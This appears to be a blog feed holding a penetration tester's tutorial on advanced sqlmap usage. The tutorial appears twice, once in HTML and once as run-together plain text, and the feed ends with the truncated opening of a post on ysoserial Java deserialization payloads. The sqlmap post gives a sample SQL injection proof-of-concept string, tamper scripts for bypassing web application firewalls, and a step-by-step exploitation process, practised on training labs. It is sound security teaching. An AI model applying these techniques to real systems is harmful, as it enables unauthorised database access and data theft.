previously listed, as the data must be retrieved indirectly via boolean inference.</li><li><b>Time based blind (T)</b> - This technique is similar to boolean blind, in that it retrieves data via posing a number of True/False style questions to the database, however instead of determining the answers to these questions via the content of a response, it is done using the amount of time a response takes. This is done through associating deliberate delays with particular answers via database statements that consume a noticeable amount of time, like sleep. This is the most time consuming method of data retrieval, and is sensitive to errors introduced by network load. Without careful custom configuration, you may find sqlmap selecting this technique for trickier injection vulnerabilities that can be exploited by more efficient means.</li></ul><br/><br/>Selecting a particular technique, or set of techniques will limit the payloads that sqlmap will use to those associated with that/those technique/s. It is also possible to further filter the attempted payloads via the --test-filter and --test-skip options to target payloads that contain (or do not contain) particular text within their name.<br/><br/>If, for example, you know your target SQLi vulnerability exists within the 'ORDER BY' clause of a query, why not filter for only these test payloads by using:<br/><br/><pre class="code">--test-filter='ORDER BY'</pre><br/><br/>In addition, if you write your own custom test payload for an injection, you can use only that particular payload by setting a filter for a unique string you have added to the name.<br/><br/><b>Note</b>: To have the best chance of being able to configure sqlmap to detect and exploit a given difficult vulnerability, its important that you properly understand the type of injection you wish to use and the requirements for its exploitation. This is because for injection vulnerabilities that sqlmap cannot find on its own you have to be able to create an effective POC exploit manually to use as a basis for correctly setting sqlmap's configuration . Hopefully this brief summary of the available injection types is appropriately clear and detailed in order to provide a sufficient refresher, but if you are unclear on these techniques you may wish to do further research on any techniques you are unfamiliar with before continuing.<br/><br/><br/><h4><span style="font-size: large;">Risks and levels</span></h4><br/>The risks and levels settings in sqlmap will control which test payloads will be attempted during the detection run to identify an SQLi vulnerability. Each test payload has a configured level and risk setting, and if the configured threshold is not met for that payload during a particular run of the tool, that particular payload will not be used.<br/><br/>Risk in sqlmap refers to the risk of a failure, potential database damage or error in data retrieval associted with using an associated payload. Available risk settings range from 1 to 3, with 1 (the lowest level) being the default.<br/><br/>Level refers to the number of requests required to use that associated payload for exploitation. Available level settings range from 1 to 5, with 1 again the default.<br/><br/>A common recommendation given in various usage guides is to increase the risk and level settings if sqlmap does not identify a vulnerability in its default configuration, however in my experience for trickier injection vulnerabilities this change alone is often not sufficient.<br/><br/><br/><h4><span style="font-size: large;">Detection options</span></h4><br/>Using the boolean blind injection technique will often require that you tell sqlmap what to look for in the HTTP response content in order to distinguish a True condition from a False. There are a number of options in sqlmap that allow you to configure this behavior, such as --string and --not-string (configuring strings that should appear in True and False responses respectively), --regexp (allowing you to set a regular expression to match to determine the True condition), --code (provide a HTTP status code to match True), --text-only (compare responses based on text content) and --titles (compare responses based on page title).<br/><br/>A neat thing you can do with the --string and --not-string settings is to use Python hexadecimal backslash quoting to do multi line matching. Here is an example showing how to match a section of HTML that includes newlines (\x0a) and tabs (\x09).<br/><br/><br/><pre class="code">--string='Name\x0a\x09\x09Stephen'</pre><br/>When your detection needs are more complex than what can be satisfied by the above options, there is also another sqlmap feature that with a little bit of imagination you can abuse in order to perform more complex comparative logic, which leads us to...<br/><h4><br/><span style="font-size: large;">Second order injection</span></h4><br/>sqlmap contains a --second-order option, which is intended to be used to enable exploitation of second order SQL injection vulnerabilities, where the results of an SQL injection need to be retrieved from a different URL than that is used to actually perform the injection. The option allows you to provide a single URL which will be requested by sqlmap after each injection payload is sent, and then parsed as per normal configured sqlmap behavior.<br/><br/>By setting the --second-order option to point to your own locally run custom forwarding and parsing server, you can make use of this option to return arbitrary content to sqlmap, perhaps based on data you have automatically retrieved from the target site. This capability can be used to do things such as retrieve data from a dynamically changing second order URL at the target site, or to retrieve content from the remote site and perform complex parsing or logic checks on it, passing through to sqlmap something that it can process using its inbuilt functionality.<br/><br/><a href="https://github.com/stephenbradshaw/pentesting_stuff/blob/master/helper_servers/sqlmap_secondorder_helper_server.py">This link</a> contains a modifiable second-order forwarding server that I wrote in Python to work with sqlmap, which can be run locally from the command line. It starts its own http server locally on the loopback address, and when it receives a request from sqlmap it can request data from another website, then return the (optionally) parsed data back to sqlmap. It is based on Python classes that I wrote specifically to facilitate reuse and modification, so if you can code simple Python you can change it to do any parsing or fetching job you wish.<br/><br/><br/><h4><span style="font-size: large;">Tamper scripts</span></h4><br/>Tamper scripts in sqlmap allow you to make programmatic changes to all the request payloads sent by sqlmap, in order to facilitate the bypass of web application firewalls and other filters. If you are dealing with filters that prohibit, for example, all whitespace within an injection string, there is a tamper script configured that can help (--tamper=space2comment). A reasonably up to date listing of available tamper scripts and their purpose is available <a href="http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html">here</a>.<br/><br/><br/><h4><span style="font-size: large;">Custom written test payloads</span></h4><br/>sqlmap comes configured with a large number of test payloads that it can use to perform injections. These are defined within xml files named after the associated injection technique stored in xml/payloads under the sqlmap root path. You can add your own payloads into these files by copying the xml nodes of an existing test (one thats simlar to the one you want to create) and modifying it as required. There is an example of doing this <a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/Sqlmap-Tricks-for-Advanced-SQL-Injection/">here</a>, and a specific example of how to use custom test payloads to exploit a boolean blind issue inside the ORDER BY clause will be provided in a future post.<br/><br/><br/><h4><span style="font-size: large;">Verbosity and debugging injection checks</span></h4><br/>One extremely useful option for troubleshooting sqlmap's detection process is the output verbosity option. The specific setting I use most frequently when getting an injection working is -v3, which will show each raw payload that is sent by sqlmap. This allows you to compare the payloads sent by sqlmap to your own POC SQL injection string developed during discovery of the vulnerability, to determine where sqlmap is incorrectly diverging. If you need to use tamper scripts as well to bypass a filter, you can try verbosity level -v4 to also see the HTTP requests sent, as -v3 verbosity will not show the affect of tamper scripts.<br/><br/><blockquote class="tr_bq"><b>Note</b>: You can also configure sqlmap to work through an intercepting proxy for debugging purposes. However, while I generally always have Burp Suite running when Im testing any web application, I usually prefer to avoid filling up my proxy history and slowing down the operation of sqlmap by doing this. Sometimes, if I really want to have a close look at requests and responses, I will run up a separate proxy instance using something like <a href="https://github.com/zaproxy/zaproxy">ZA Proxy</a>.</blockquote><br/><h4><br/><span style="font-size: large;">Auto answering</span></h4><br/>Under certain circumstances, sqlmap will ask you the same set of one or more repeated questions every time you run the tool. Some of these questions are without their own associated command line options, and therefore without an obvious way to inform sqlmap of the desired behavior so you don't have to repeatedly answer the same question the same way every time sqlmap prompts you. The --answers option allows you to provide a standard response to these questions - to use it, pick a unique term from the question itself, and provide this along with the desired response.<br/><br/>For example, to preemptively answer Yes to allow sqlmap to attempt to "optimize" timing settings during blind timing based injections, use the following.<br/><br/><pre class="code">--answers='optimize=Y'</pre><br/><h4><span style="font-size: large;">Session flushing</span></h4><br/>sqlmap keeps session information about each url, including which techniques and payloads have been confirmed to work and what data has been retrieved from the site. If a non optimal payload type has been associated with a particular url within the relevant session, you may want to clear that session information in order to try and get a new payload to work. You can flush all data associated with a URL, and force the detection process to run again, using the following option.<br/><br/><pre class="code">--flush-session</pre><br/><h4><br/><span style="font-size: large;">Other options</span></h4><br/>Some other options I commonly use are the parameter option which specifies which parameter is used to perform the injection (e.g. -p 'vulnerable_parameter') and the options to specify the database (e.g. --dbms='mysql') and the Operating System (--os='linux') in use on the remote server. These all help sqlmap to avoid making extraneous requests beyond what you already know will be effective based on your knowledge of the target web application. Sometimes of course the injection point is not within a parameter, in which case sqlmap has other options which can be used to target its operation, such as the asterisk character (*) which can be used to set manual injection point within a request.<br/><br/><br/><h3></h3><h3>Tweaking sqlmap options to detect tricky injections</h3><br/>Before you can use sqlmap to effectively exploit an injection issue, you must get it to detect the vulnerability, which associates one or more injection techniques and payloads with the URL associated with the issue. Once this has occurred, the detection process does not need to run again, and sqlmaps options for exploitation and data retrieval can be immediately used on subsequent executions of the tool.<br/><br/>The following is the process I use for taking a manually discovered SQL injection vulnerability and configuring sqlmap to exploit it.<br/><ol><li>Develop the manual exploit to the point where a POC for the best applicable exploitation technique exists. For a UNION SELECT vulnerability, this means you want to discover the number of columns in the UNION, and perhaps also the datatypes of each column (numeric, text, date, etc). For a boolean blind, you will want to be able to trigger different pages responses for True and False conditions, and determine how you could differentiate the True response from the False. For a time based blind, you want to get a response to delay for a given period of seconds based on the success or failure of some comparison you make, etc. This step will also include working out whether any specific characters are restricted by some sort of filter or other application issue, and hence are unusable in performing the injection.</li><br/><li>Run sqlmap, configuring the backend database type (--dbms), Operating System (--os), and technique (--technique) options to specifically target the manually discovered issue. Set the parameter (-p) option as well if the injection is in a URL or POST data parameter, or use other options such as the injection point asterisk (*) as appropriate to tell sqlmap exactly where the injection is located. This helps focus the detection process, minimising requests sent and time taken by ignoring non-vulnerable parameters and payloads that target other databases or are associated with unwanted injection techniques. You may also need to provide proxy details, cookies or other authentication options, CSRF management options, safe URL settings to avoid lockouts, etc as appropriate, to ensure that sqlmap can correctly send and receive HTTP requests and responses. If you have already created a manual injection POC in a separate tool you should already know all the correct settings to use for this purpose. Leave all other options at the default. I do all my manual testing using Burp Suite Professional, so I use the <a href="https://github.com/JGillam/burp-co2">CO2 plugin</a> and its SQLMapper component to quickly set the relevant command line options. From this point on in the process, as soon as you get sqlmap to detect the vulnerability, you can skip the remaining steps (hopefully thats obvious). </li><br/><li>Run the detection again, however this time use the -v3 verbose option on so you can see the payloads being sent. Scroll through the output, looking for an injection string thats similar in layout to the POC developed earlier, which will cause the response you require. At this point you may see the names of likely looking payloads that are not being sent here because the --level or --risk settings are too low. If so, raise these values and try again and see if you can find an appropriate payload that comes as close as possible to what you need.</li><br/><li>If at this point you still do not see a payload that looks like it will be able to provide the output needed to make the injection succeed, you will need to write your own. Pick an example from the xml file named after the appropriate injection technique thats as close as possible to what you need, and modify as required. The earlier section on custom test payloads contains references that help describe this process, and a future post in this series will also have a specific example.</li><br/><li>Once sqlmap is sending a payload that is logically similar to your POC, the goal is to now tweak the relevant sqlmap options to get the request syntactically correct for the injection. At this point you will want to set the --test-filter option in order to send only your chosen payload, and try and determine what needs to change with the payload to make it work. By "work" I mean that you must be creating injected queries that are syntactically correct and the results must not involve database errors, displayed to you or otherwise, UNLESS you are doing error based injection and that error is displayed to you and contains your chosen content. This troubleshooting may involve taking the payload from the sqlmap verbose output and pasting it into your manual testing tool (i.e. Burp Suite Professional's Repeater) to see if it returns a syntactically correct result. Sometimes however, you can just eyeball it and tell where there are some obvious issues. The next step provides guidance on how to fix syntax issues.</li><br/><li>If the payload being sent is resulting in a SQL query that is NOT syntactically correct, there are 3 primary reasons for this. Work out which issue (or combination of issues) is causing the problem, and work to resolve these as discussed below before moving on to the next step.</li><br/><ul><li>The first possible reason is that the prefix and suffix have been set incorrectly (either manually by you or automatically by sqlmap). You know this is the case if the text used at the start of the payload to break into the injection, or the text at the end used to terminate it, are syntactically different from your POC. Correctly set the suffix and prefix options to fix this - the right values should be easy to identify as they will be included in your manual POC. Be aware here that certain test payloads are configured to place random values at the start of the payload output. If you set the --prefix option and don't see the configured string at the very start of the payload output you are using in sqlmap's verbose output, you know that the payload configuration itself is the cause (specifically, the where option in the payload configuration), which is the second possible reason.</li><li>Second, the definition of the test payload itself is causing an error for some reason. I have seen the sqlmap default payloads break in some cases, but the most likely way for this to occur is when you have written the payload yourself. If the text or logic or the placement of the random values used by sqlmap in the meat of the payload is causing the issue, the problem might be with the definition of the test payload (or you might be focusing on using the wrong payload and another one you have overlooked is more appropriate). Modify the payload, try a different one, or create a your own custom new one to fix this.</li><li>Third, there is some sort of filter implemented in the space between when you send the request and when the resultant query reaches the database that is causing an otherwise syntactically correct payload to be rejected. This is where tamper scripts can be used to (hopefully) filter out or replace the offending characters. Don't forget to bump your verbosity setting to -v4 in order to see HTTP requests in the output if you need to troubleshoot these. You can either use one of the existing tamper scripts (if a suitable one exists) or write your own. If the filtering is particularly prohibitive, you may need to consider writing a payload that makes use of inventive SQL to avoid your given bad patterns.</li></ul><br/><li>Once your queries are syntactically correct, the next step is ensuring that sqlmap can correctly interpret the results it is receiving (and, in the case of second order injections, that it is receiving the correct results at all!). Setting aside second-order injections for the moment (we will cover this in more detail in a future example), sqlmap is generally pretty good at this for all of its techniques other than boolean blind injection. For these, you will often need to tell it how to distinguish True from False responses. This is where the detection options such as --string, --not-string and --regex discussed earlier come into play - use these to help sqlmap identify the appropriate responses.</li><br/></ol><br/><br/>Once you have completed these steps sqlmap should have correctly detected your vulnerability and be ready to exploit it.<br/><br/>This completes this entry in the series, stay tuned for the next post, where I will show some examples.Stephen BradshawIntroductionA number of times when discovering "tricky" SQL Injection vulnerabilities during penetration tests, I have taken the approach of exploiting them by writing custom tools. This usually after spending 5 minutes blindly poking at the vulnerability with sqlmap, and then stopping when it didn't immediately magic the answer for me.OK, there have been a number of times where sqlmap has NOT been a suitable tool to use for various reasons, such as very particular filtering or data retrieval requirements, but there has also been a number of cases where I probably gave up on it too fast because I didn't properly understand how it worked or the extent of its capabilities. And this resulted in me taking much longer than necessary to exploit the vulnerability.While writing custom tools can certainly be "fun" (for some definitions of "fun"), and while it provides some good coding practice and is an excellent way to ensure that you understand the injection flaw and its exploitation extremely well, its also very time consuming. Writing your own injection tool often involves redoing a lot of work that has already been done by others - the digital equivalent of reinventing the wheel. You need to put together a capable HTTP sending/receiving framework, you need to parse HTML responses, you need to discover the (database specific) SQL commands that will allow you to retrieve data within the limitations imposed by the vulnerability, you need to be able to extract, group, infer, convert and/or join the retrieved data and you need to mentally map out the logic needed to tie all these parts together and turn it into working code with a usable interface. Its a deceptively large amount of effort, especially when blind injection is involved, and I would consistently underestimate how long it would take to perform.Given that sqlmap already has all this functionality, being in particular a very effective tool for retrieving data via all types of SQL injection vulnerabilities, I recently decided that it might be a good idea to spend some of my time to gain an improved understanding of the tool, so that in future I would be able to make more frequent use of it.For my vulnerability test bed, I used some of the SQL injection labs from the Pentester Labs website, namely the Web for Pentester and Web for Pentester II exercises, because those particular exercises are freely downloadble, easy to self host and provide some great examples of SQLi vulnerabilities that require use of some of sqlmap's custom options for exploitation.This will be the first in a series of posts where I share some of what I learned during this process. This first post will mainly seek to introduce and explain the relevant sqlmap options that I used and outline a process that can be used to get sqlmap to identify an SQL injection flaw that you have discovered through other testing activities. Future entries will provide examples of actually using this to exploit SQL injection vulnerabilities that sqlmap cannot easily detect on its own.Note: While I will use their content as examples, the intent here is NOT to explain how to discover or do manual exploitation of the SQLi vulnerabilities in the PentesterLab exercises - because that has already been written up in the PentesterLab courseware available at their web site. If you don't already know how to do manual discovery of SQLi vulnerabilities, you can check out their site, or any of the many other SQLi references on the Internet to learn this (for the record though, I think the PentesterLab stuff is a fantastic introduction to web application pentesting, and I wish I had access to it when I first started doing webapp testing).Useful sqlmap optionsBefore I jump into working through specific examples, I wanted to describe the purpose of some sqlmap options. More advanced use of sqlmap, in terms of actually tweaking its operation in order to make a difficult injection operate, will require that you actually understand how these options work. In essence, this is the README I wish I had received when I moved beyond the bare basics in my use of the tool, as I definitely would have used sqlmap much more extensively had I understood these particular options as well as I do now. Hopefully you can now benefit from my having learned this the "hard" way, e.g. via trial and error.Prefix and suffixThe prefix (--prefix) and suffix (--suffix) options configure the strings that should be included with each SQL injection payload in order to begin, and then terminate, the Injection. So what does this mean exactly?Take this simple example of an injectible query:$query = "SELECT first_name, last_name FROM users WHERE name = '" . $_GET["username"] . "'";Whats an example of an injection string that would work here? Something like the following would work as a simple POC of a union injection.' UNION SELECT NULL,NULL -- aThis closes the single quoted string before our injection point with a single quote ('), seperates the next statement with a space ( ), adds our injection query of a UNION SELECT with a column count matching that of the existing SELECT query, and then comments out the remainder of the original query to ensure syntactical correctness. The prefix in this case is the single quote and space (' ) used before the UNION SELECT, and the suffix is the characters (a space, two dashes, another space and the letter "a") used to comment out the remainder of the original query ( -- a).The following options can be used to configure sqlmap to use this prefix and suffix: --prefix="' " --suffix=' -- a'Now, these particular examples of prefixes and suffixes (or ones that are functionality identical) are ones that sqlmap will be able to figure out itself, so you will rarely need to specify values like this. However, this hopefully does help you in understanding what these options do, because they are quite important ones to grasp if you want to use sqlmap for more difficult injections. In fact, I put these options first in the list of ones I wanted to describe because as I was working through this process of learning how to make sqlmap identify certain injection vulnerabilities, these were the ones that I used the most. Also, finally learning what these did was an "AHA!" moment for me, as I have been aware of the options existence for an embarassingly long time without understanding what they did.Note: Why use NULL values in the UNION SELECT? NULL is a great value to use in UNIONS when trying to determine the correct number of columns in an injection, as it can sit in place of a number of different field types, such as numbers, strings and dates.Note2: Why the extra space and the "a" character after the comment? Sometimes, inserted comments at the end of an injection are not properly recognised by the database unless there is a whitespace character to follow. Since whitespace characters on their own are sometimes not easily identifiable when displayed on screen (depending on what other text follows) its helpful to include other text afterwards so you can easily see there is something following the comment. You will see sqlmap do this when you look at some of the injection strings it uses.Specifying Injection technique and testsThere are a number of different SQL injection techniques available for use in sqlmap, which are configured via the --technique option, and sqlmap comes with a number of different in built tests for exploiting vulnerabilities using those techniques. By default, sqlmap will enable all possible techniques when trying to identify an injection vulnerability, and will run all associated tests that meet the configured risk and level settings (discussed later).If you have manually discovered a SQL injection flaw in a website and want to use sqlmap to exploit the vulnerability, you may already know the correct technique, as well as the most appropriate payload configuration to use, and this is where specifying these options manually can be useful. Manual specification of these settings helps prevents less effective techniques from being chosen by sqlmap, and cuts down on the amount of traffic sent by sqlmap during its detection period.A brief listing of the injection techniques available for use by sqlmap is listed below in order of preference. You can select the appropriate ones by using the --technique switch followed by a listing of the letters associated with the method/s you wish to use. The default is all options, (e.g. "--technique=BEUSTQ"). The descriptions provided below are only intended as high level reminders of each techniqueStacked queries (S) - This involves stacking whole new SQL queries onto the end of the existing injectable query. Its the preferred method to use if available, because there are a number of exploitation actions that wont be available to you using any other method, however the use of this method does require support from the database and API. You may not necessarily be able to see the results of your stacked query in the page response, so when actually retrieving data (as opposed to performing other operations such as INSERTS) you may want to use another technique such as Unions.Union query based (U) - This involves retrieving data by joining a second select statement to the original, via the UNION SELECT statement. You need to be able to see the results from the original SELECT query (and hence your UNION) in the page response for this method to be usable.Error based (E) - This technique retrieves data by manipulating database error messages to directly display that data. To use this method, you need to be able to see database error messages in page responses.Inline queries (I) - This technique uses inline database queries to retrieve data - essentially a query embedded within another query like this "SELECT (SELECT password from user) from product". I have not personally had the occasion to use this option in sqlmap, and while inline queries can be used more widely than this in manual injection scenarios, it appears that you need to be able to see the inline queries result in the page response for this to be usable through sqlmap.Boolean blind (B) - This retrieves data from the database by asking a series of True/False style questions in your injections, and determining the result (True or False) based on identifiable changes in the response. To use this option, you need to be able to be able to trigger some sort of identifiable state change in HTTP response content from logically different, but syntactically correct database queries (e.g. a different page response only resulting from an invalid database query doesn't count here). This technique will require more requests and time to perform than those previously listed, as the data must be retrieved indirectly via boolean inference.Time based blind (T) - This technique is similar to boolean blind, in that it retrieves data via posing a number of True/False style questions to the database, however instead of determining the answers to these questions via the content of a response, it is done using the amount of time a response takes. This is done through associating deliberate delays with particular answers via database statements that consume a noticeable amount of time, like sleep. This is the most time consuming method of data retrieval, and is sensitive to errors introduced by network load. Without careful custom configuration, you may find sqlmap selecting this technique for trickier injection vulnerabilities that can be exploited by more efficient means.Selecting a particular technique, or set of techniques will limit the payloads that sqlmap will use to those associated with that/those technique/s. It is also possible to further filter the attempted payloads via the --test-filter and --test-skip options to target payloads that contain (or do not contain) particular text within their name.If, for example, you know your target SQLi vulnerability exists within the 'ORDER BY' clause of a query, why not filter for only these test payloads by using:--test-filter='ORDER BY'In addition, if you write your own custom test payload for an injection, you can use only that particular payload by setting a filter for a unique string you have added to the name.Note: To have the best chance of being able to configure sqlmap to detect and exploit a given difficult vulnerability, its important that you properly understand the type of injection you wish to use and the requirements for its exploitation. This is because for injection vulnerabilities that sqlmap cannot find on its own you have to be able to create an effective POC exploit manually to use as a basis for correctly setting sqlmap's configuration . Hopefully this brief summary of the available injection types is appropriately clear and detailed in order to provide a sufficient refresher, but if you are unclear on these techniques you may wish to do further research on any techniques you are unfamiliar with before continuing.Risks and levelsThe risks and levels settings in sqlmap will control which test payloads will be attempted during the detection run to identify an SQLi vulnerability. Each test payload has a configured level and risk setting, and if the configured threshold is not met for that payload during a particular run of the tool, that particular payload will not be used.Risk in sqlmap refers to the risk of a failure, potential database damage or error in data retrieval associted with using an associated payload. Available risk settings range from 1 to 3, with 1 (the lowest level) being the default.Level refers to the number of requests required to use that associated payload for exploitation. Available level settings range from 1 to 5, with 1 again the default.A common recommendation given in various usage guides is to increase the risk and level settings if sqlmap does not identify a vulnerability in its default configuration, however in my experience for trickier injection vulnerabilities this change alone is often not sufficient.Detection optionsUsing the boolean blind injection technique will often require that you tell sqlmap what to look for in the HTTP response content in order to distinguish a True condition from a False. There are a number of options in sqlmap that allow you to configure this behavior, such as --string and --not-string (configuring strings that should appear in True and False responses respectively), --regexp (allowing you to set a regular expression to match to determine the True condition), --code (provide a HTTP status code to match True), --text-only (compare responses based on text content) and --titles (compare responses based on page title).A neat thing you can do with the --string and --not-string settings is to use Python hexadecimal backslash quoting to do multi line matching. Here is an example showing how to match a section of HTML that includes newlines (\x0a) and tabs (\x09).--string='Name\x0a\x09\x09Stephen'When your detection needs are more complex than what can be satisfied by the above options, there is also another sqlmap feature that with a little bit of imagination you can abuse in order to perform more complex comparative logic, which leads us to...Second order injectionsqlmap contains a --second-order option, which is intended to be used to enable exploitation of second order SQL injection vulnerabilities, where the results of an SQL injection need to be retrieved from a different URL than that is used to actually perform the injection. The option allows you to provide a single URL which will be requested by sqlmap after each injection payload is sent, and then parsed as per normal configured sqlmap behavior.By setting the --second-order option to point to your own locally run custom forwarding and parsing server, you can make use of this option to return arbitrary content to sqlmap, perhaps based on data you have automatically retrieved from the target site. This capability can be used to do things such as retrieve data from a dynamically changing second order URL at the target site, or to retrieve content from the remote site and perform complex parsing or logic checks on it, passing through to sqlmap something that it can process using its inbuilt functionality.This link contains a modifiable second-order forwarding server that I wrote in Python to work with sqlmap, which can be run locally from the command line. It starts its own http server locally on the loopback address, and when it receives a request from sqlmap it can request data from another website, then return the (optionally) parsed data back to sqlmap. It is based on Python classes that I wrote specifically to facilitate reuse and modification, so if you can code simple Python you can change it to do any parsing or fetching job you wish.Tamper scriptsTamper scripts in sqlmap allow you to make programmatic changes to all the request payloads sent by sqlmap, in order to facilitate the bypass of web application firewalls and other filters. If you are dealing with filters that prohibit, for example, all whitespace within an injection string, there is a tamper script configured that can help (--tamper=space2comment). A reasonably up to date listing of available tamper scripts and their purpose is available here.Custom written test payloadssqlmap comes configured with a large number of test payloads that it can use to perform injections. These are defined within xml files named after the associated injection technique stored in xml/payloads under the sqlmap root path. You can add your own payloads into these files by copying the xml nodes of an existing test (one thats simlar to the one you want to create) and modifying it as required. There is an example of doing this here, and a specific example of how to use custom test payloads to exploit a boolean blind issue inside the ORDER BY clause will be provided in a future post.Verbosity and debugging injection checksOne extremely useful option for troubleshooting sqlmap's detection process is the output verbosity option. The specific setting I use most frequently when getting an injection working is -v3, which will show each raw payload that is sent by sqlmap. This allows you to compare the payloads sent by sqlmap to your own POC SQL injection string developed during discovery of the vulnerability, to determine where sqlmap is incorrectly diverging. If you need to use tamper scripts as well to bypass a filter, you can try verbosity level -v4 to also see the HTTP requests sent, as -v3 verbosity will not show the affect of tamper scripts.Note: You can also configure sqlmap to work through an intercepting proxy for debugging purposes. However, while I generally always have Burp Suite running when Im testing any web application, I usually prefer to avoid filling up my proxy history and slowing down the operation of sqlmap by doing this. Sometimes, if I really want to have a close look at requests and responses, I will run up a separate proxy instance using something like ZA Proxy.Auto answeringUnder certain circumstances, sqlmap will ask you the same set of one or more repeated questions every time you run the tool. Some of these questions are without their own associated command line options, and therefore without an obvious way to inform sqlmap of the desired behavior so you don't have to repeatedly answer the same question the same way every time sqlmap prompts you. The --answers option allows you to provide a standard response to these questions - to use it, pick a unique term from the question itself, and provide this along with the desired response.For example, to preemptively answer Yes to allow sqlmap to attempt to "optimize" timing settings during blind timing based injections, use the following.--answers='optimize=Y'Session flushingsqlmap keeps session information about each url, including which techniques and payloads have been confirmed to work and what data has been retrieved from the site. If a non optimal payload type has been associated with a particular url within the relevant session, you may want to clear that session information in order to try and get a new payload to work. You can flush all data associated with a URL, and force the detection process to run again, using the following option.--flush-sessionOther optionsSome other options I commonly use are the parameter option which specifies which parameter is used to perform the injection (e.g. -p 'vulnerable_parameter') and the options to specify the database (e.g. --dbms='mysql') and the Operating System (--os='linux') in use on the remote server. These all help sqlmap to avoid making extraneous requests beyond what you already know will be effective based on your knowledge of the target web application. Sometimes of course the injection point is not within a parameter, in which case sqlmap has other options which can be used to target its operation, such as the asterisk character (*) which can be used to set manual injection point within a request.Tweaking sqlmap options to detect tricky injectionsBefore you can use sqlmap to effectively exploit an injection issue, you must get it to detect the vulnerability, which associates one or more injection techniques and payloads with the URL associated with the issue. Once this has occurred, the detection process does not need to run again, and sqlmaps options for exploitation and data retrieval can be immediately used on subsequent executions of the tool.The following is the process I use for taking a manually discovered SQL injection vulnerability and configuring sqlmap to exploit it.Develop the manual exploit to the point where a POC for the best applicable exploitation technique exists. For a UNION SELECT vulnerability, this means you want to discover the number of columns in the UNION, and perhaps also the datatypes of each column (numeric, text, date, etc). For a boolean blind, you will want to be able to trigger different pages responses for True and False conditions, and determine how you could differentiate the True response from the False. For a time based blind, you want to get a response to delay for a given period of seconds based on the success or failure of some comparison you make, etc. This step will also include working out whether any specific characters are restricted by some sort of filter or other application issue, and hence are unusable in performing the injection.Run sqlmap, configuring the backend database type (--dbms), Operating System (--os), and technique (--technique) options to specifically target the manually discovered issue. Set the parameter (-p) option as well if the injection is in a URL or POST data parameter, or use other options such as the injection point asterisk (*) as appropriate to tell sqlmap exactly where the injection is located. This helps focus the detection process, minimising requests sent and time taken by ignoring non-vulnerable parameters and payloads that target other databases or are associated with unwanted injection techniques. You may also need to provide proxy details, cookies or other authentication options, CSRF management options, safe URL settings to avoid lockouts, etc as appropriate, to ensure that sqlmap can correctly send and receive HTTP requests and responses. If you have already created a manual injection POC in a separate tool you should already know all the correct settings to use for this purpose. Leave all other options at the default. I do all my manual testing using Burp Suite Professional, so I use the CO2 plugin and its SQLMapper component to quickly set the relevant command line options. From this point on in the process, as soon as you get sqlmap to detect the vulnerability, you can skip the remaining steps (hopefully thats obvious). Run the detection again, however this time use the -v3 verbose option on so you can see the payloads being sent. Scroll through the output, looking for an injection string thats similar in layout to the POC developed earlier, which will cause the response you require. At this point you may see the names of likely looking payloads that are not being sent here because the --level or --risk settings are too low. If so, raise these values and try again and see if you can find an appropriate payload that comes as close as possible to what you need.If at this point you still do not see a payload that looks like it will be able to provide the output needed to make the injection succeed, you will need to write your own. Pick an example from the xml file named after the appropriate injection technique thats as close as possible to what you need, and modify as required. The earlier section on custom test payloads contains references that help describe this process, and a future post in this series will also have a specific example.Once sqlmap is sending a payload that is logically similar to your POC, the goal is to now tweak the relevant sqlmap options to get the request syntactically correct for the injection. At this point you will want to set the --test-filter option in order to send only your chosen payload, and try and determine what needs to change with the payload to make it work. By "work" I mean that you must be creating injected queries that are syntactically correct and the results must not involve database errors, displayed to you or otherwise, UNLESS you are doing error based injection and that error is displayed to you and contains your chosen content. This troubleshooting may involve taking the payload from the sqlmap verbose output and pasting it into your manual testing tool (i.e. Burp Suite Professional's Repeater) to see if it returns a syntactically correct result. Sometimes however, you can just eyeball it and tell where there are some obvious issues. The next step provides guidance on how to fix syntax issues.If the payload being sent is resulting in a SQL query that is NOT syntactically correct, there are 3 primary reasons for this. Work out which issue (or combination of issues) is causing the problem, and work to resolve these as discussed below before moving on to the next step.The first possible reason is that the prefix and suffix have been set incorrectly (either manually by you or automatically by sqlmap). You know this is the case if the text used at the start of the payload to break into the injection, or the text at the end used to terminate it, are syntactically different from your POC. Correctly set the suffix and prefix options to fix this - the right values should be easy to identify as they will be included in your manual POC. Be aware here that certain test payloads are configured to place random values at the start of the payload output. If you set the --prefix option and don't see the configured string at the very start of the payload output you are using in sqlmap's verbose output, you know that the payload configuration itself is the cause (specifically, the where option in the payload configuration), which is the second possible reason.Second, the definition of the test payload itself is causing an error for some reason. I have seen the sqlmap default payloads break in some cases, but the most likely way for this to occur is when you have written the payload yourself. If the text or logic or the placement of the random values used by sqlmap in the meat of the payload is causing the issue, the problem might be with the definition of the test payload (or you might be focusing on using the wrong payload and another one you have overlooked is more appropriate). Modify the payload, try a different one, or create a your own custom new one to fix this.Third, there is some sort of filter implemented in the space between when you send the request and when the resultant query reaches the database that is causing an otherwise syntactically correct payload to be rejected. This is where tamper scripts can be used to (hopefully) filter out or replace the offending characters. Don't forget to bump your verbosity setting to -v4 in order to see HTTP requests in the output if you need to troubleshoot these. You can either use one of the existing tamper scripts (if a suitable one exists) or write your own. If the filtering is particularly prohibitive, you may need to consider writing a payload that makes use of inventive SQL to avoid your given bad patterns.Once your queries are syntactically correct, the next step is ensuring that sqlmap can correctly interpret the results it is receiving (and, in the case of second order injections, that it is receiving the correct results at all!). Setting aside second-order injections for the moment (we will cover this in more detail in a future example), sqlmap is generally pretty good at this for all of its techniques other than boolean blind injection. For these, you will often need to tell it how to distinguish True from False responses. This is where the detection options such as --string, --not-string and --regex discussed earlier come into play - use these to help sqlmap identify the appropriate responses.Once you have completed these steps sqlmap should have correctly detected your vulnerability and be ready to exploit it.This completes this entry in the series, stay tuned for the next post, where I will show some examples.CommonCollections deserialization attack payloads from ysoserial failing on > JRE 8u722016-05-01T05:27:00+00:002016-05-01T05:27:00+00:00/2016/05/01/commoncollections-deserializationRecently, while trying to exploit a Java app vulnerable to a <a href="https://www.owasp.org/index.php/Deserialization_of_untrusted_data">deserialisation attack</a>, I was having some issues getting the CommonsCollections1 payload from <a href="https://github.com/frohoff/ysoserial">ysoerial</a> working. In case you're not familiar with this, essentially the <a href="https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread"><=3.2.1 versions of the Apache Commons Collections library</a> can be used to create an attack payload of Java serialized data that can be used to execute local commands on systems running Java applications that deserialize untrusted attacker supplied content. The ysoserial tool enables an attacker to create a number of different serialized Java attack 